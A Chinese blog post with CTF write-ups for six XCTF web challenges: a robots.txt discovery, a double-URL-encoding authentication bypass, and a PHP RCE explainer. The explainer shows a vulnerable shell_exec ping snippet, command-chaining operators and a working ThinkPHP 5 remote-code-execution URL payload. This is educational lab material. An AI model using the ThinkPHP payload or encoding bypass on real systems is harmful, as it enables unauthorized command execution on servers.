【攻防世界】进阶区write up1~6(一)

已于 2022-04-19 17:30:30 修改
阅读量2.1k 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: web php
于 2022-04-09 16:37:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GZWZ_/article/details/123932596
版权

目录

1.baby web

2. ics_06

3.Training-WWW-Robots

4.PHP2

             Can you anthenticate to this website?

5.Web_php_unserialize(这是第五个wp戳它)

6.php_rce

Think PHP介绍

远程代码执行命令(不唯一)

1.baby web

打开源代码,发现没什么信息,直接抓包,ok啦!

2. ics_06

3.Training-WWW-Robots

根据题目,robot协议,尝试输入robot.txt,出现报错,再次输入robots.txt

出现flag.php,输入即可得到flag

4.PHP2

             Can you anthenticate to this website?

 

分析源码,需要绕过"admin"===G E T [ i d ] ,再结合urldecode(_GET[id]),由于浏览器会自动url解码一次,我们可以通过两次hex编码(url编码在此基础上加%)即可,当然这里我们可以对admin全部编码,也可以部分编码,都是可以绕过的。

 对admin进行url编码,

urldecode(%2561)=%61  
urldecode(%61)=a

5.Web_php_unserialize(这是第五个wp戳它)

https://blog.csdn.net/GZWZ_/article/details/124277990?spm=1001.2014.3001.5502

6.php_rce

1)什么是远程代码执行

远程命令执行 英文名称:RCE (remote code execution) ,简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

分为远程命令执行ping和远程代码执行evel。
漏洞出现的原因:没有在输入口做输入处理。
我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。具体后端代码如下:
 

$result.=shell_exec('ping '.$ip);//直接将变量拼接进来,没做处理

2)远程代码执行的特点

远程代码执行是指攻击者可能会通过远调用的方式来攻击或控制计算机设备,无论该设备在哪里。

3) 作用
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

4) 原理
一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。 现在很多的企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。 远程代码执行 同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。

系统命令执行函数
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
windows系统命令拼接方式
“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B
 

Think PHP介绍

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

百度:ThinkPHP V5版本存在远程代码执行漏洞 

远程代码执行命令(不唯一)

payload:/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag" 

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

添砖@Java
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界PHP2详细解答
m0_74047686的博客
03-13 4341
1.后缀名为.phps的文件:phps即php source,phps文件就是php的源代码文件,通常用于提供给用户查看php代码,因为用户无法通过web浏览器直接查看到php文件的内容,所以需要用phps文件代替2.在传入参数时,浏览器会对非ASCII编码行一次urlencode,结果在代码执行时,相当于id还是admin,所以我们在传参时需要行两次URL编码3.在URL编码中, "%" 符号是一个特殊字符,它被用来表示接下来的两个字符是一个ASCII值的十六制表示。
攻防世界web刷题记录(1)
bmth666的博客
03-27 4627
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
CTF_Web:攻防世界高手题WP(9-14)
AFCC_的博客(Web_Dog)
08-08 3066
持续更新ing 0x09 PHP2 题目只有一句话,Can you anthenticate to this website?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode
实验室任务三
最新发布
doubirui的博客
11-14 169
a=0+任意字母。
攻防世界-Web-PHP2
七堇年的博客
04-15 3866
PHP2 文章目录PHP2 题目考点: 题目考的是对信息的简单收集,找到源码,并对id参数值admin行二次加密 解题步骤 首先入页面后发现一串英文:Can you anthenticate to this website? ,他的意思是你能登录这个网站吗?,那么说明应该有隐藏的登陆页面,利用工具dirsearch行扫描 这里我们发现了index.php页面,访问 还是这句话,并且源代码中没有东西 此时我们可以利用phps行源码查看 接下来观察回显内容 not allo
无线网络安全攻防实战
01-28
无线网络安全攻防实战,无线网络安全攻防实战,有问题加q1186351245
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界杂项流量分析1
11-14
攻防世界杂项流量分析1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840807
攻防世界-Web篇-004PHP2】
gyy990526的博客
03-14 2029
解:打开靶机出现一句话,Can you anthenticate to this website?你能浏览这个网站么 正常思路就是F12看看有没有什么提示,发现没有,那就一下index.php试一试还是没有变化,就算有变化可能也是被藏起来了,那就试试有没有源代码.phps文件,发现有源代码,接下来就是审计环节了。 如果id严格等于admin就会提示你不允许登录,也就是?id=admin 下面是对id的一次解码后再对其行与admin的比较,那咱们也就是需要对admin行一次加密,但值.
攻防世界-web -高手-PHP2
wyj_1216 House
07-09 9959
题目 writeup 首先发现源码泄露 /index.phps 查看源代码 即: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { e...
第三周学习心得
LS_Sy的博客
11-07 73
phps即为 PHP Sourcephps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替在网站的升级和维护过程中,通常需要对网站中的文件行修改。此时就需要对网站整站或者其中某一页面行备份。当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站 web 目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2505
web篇(php_rce)详解
攻防世界web高手(一)
weixin_44866139的博客
03-13 1845
Training-WWW-Robots baby_web 因为提示了初始页面是哪个,所以查看111.198.29.45:39340/index.php 直接给跳转到了http://111.198.29.45:39340/1.php 抓包试试 发现了flag 标题 ...
CTF题目记录3(二次编码,反序列化)
kkzzjx
05-15 1796
miniL被虐了QAQ太菜惹555 有精通php反序列化的旁友可以暗搓搓交换下思路 PHP2 (攻防世界) Can you anthenticate to this website? 其他什么都没有 index.phps源码泄露(记在小本本上,Phps是php的源码) 好脑洞 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_G
XCTF-高手:PHP2
1stPeak's Blog
06-14 3657
XCTF-高手-第四题:PHP2 目标: Writeup (1)首先我们用dirsearch.py行网站目录搜索 (2)我们发现有个index.php,我们访问一下,没有结果... 那么我们看看能否看看该网页php地源码,这里用到了.phps .phps后缀释义: phps文件就是php的源代码文件。 通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览...
攻防世界WEB之PHP2
harry_c的博客
07-31 6260
攻防世界WEB之PHP2第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 根据题目,没有给出任何信息,直接是一个场景,点击打开场景页面我们发现是一串文字:Can you anthenticate to this website? 第二步:实操 首先想到尝试index.php,未果。再尝试index.phps,成功发现了代码泄露。 <?...
SpringSecurity 源码解读(一)
feijingguan的博客
08-10 627
由于读官方文档有些技术实在是不能用,所以我开始阅读源代码来行学习,先从各种项目都会使用到认证拦截器开始 注意,由于笔者还没有对整个SpringSecurity完全掌握,所以只能对常用的流程所用到的代码行解读,不过肯定是绝大部分的代码 前言:由于这个类太大了,所以这里先叙述常用的部分,内部类等其他不常用的后面会补上,建议读者读前要先对SpringSecurity的运行流程有认识.
攻防世界warmup
08-11
回答:攻防世界warmup是一个挑战赛,旨在提供实践攻防技能的机会。在这个挑战中,参与者需要应用所学的知识和技术来解决各种安全问题。根据引用,本周的主要题解内容包括文件上传漏洞语句、sqlmap中的一系列命令、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值